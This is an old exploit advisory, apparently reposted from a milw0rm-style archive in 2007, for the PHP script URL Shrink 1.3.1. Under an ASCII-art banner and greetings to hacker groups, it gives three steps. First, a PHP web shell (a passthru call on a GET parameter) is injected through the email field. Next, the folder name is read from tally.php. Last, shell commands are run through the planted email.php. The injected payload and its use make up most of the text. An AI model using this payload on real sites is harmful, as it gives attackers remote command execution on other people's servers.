Rated as : Moderate Risk
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ )
\_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
)_/ \ /
(@
+_______________________________________________Iranian Are The Best In
World___________________________________________+
+
+ /*************************__I N F
O__**************************\
+ |* *|
+ |* U R L S H R I N K
*|
+ |*
*|
+ |* Portal: Urlshrink
*|
+ |* Version: 1.3.1
*|
+ |* Release: 26-07-2006 *|
+ |* www: www.developers.jccorp.net
*|
+ |* Author: Dj7xpl | Dj7xpl@yahoo.com
*|
+ |*
*|
+
\**************************************************************/
+_______________________________________________________________________________________________________________________+
+________________________________________________________E X P L O I
T__________________________________________________+
+
+
+ E X P L O I T - -
+ --------------
+
+ 1) Insert Bad Code
+
+ [X] Enter Your URL to shrink: (Enter Random Url) E.g :
milw0m.com
+ [X] Enter your Email Address: (Enter Bad Code) E.g : <?php
passthru($_GET[cmd]);?>
+
+
+
+ 2) See Folder Name
+
+ [X] http://[Target]/[Path]/data/tally.php
+ [X] http://localhost/urlshrink/data/tally.php E.g : 5
+
+
+
+ 3) Visit Your Code
+
+ [X] http://localhost/urlshrink/[Folder Name]/email.php
+ E.g : http://localhost/urlshrink/5/email.php?cmd=ls -la
+
+
+
+
+_______________________________________________________________________________________________________________________+
+___________________________________________________________T N
X_______________________________________________________+
+
+
+ Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar,
Hacker.ir, Shabgard.org, Simorgh .............
+
+_______________________________________________________________________________________________________________________+
securitydot.net - 2007-03-30
|
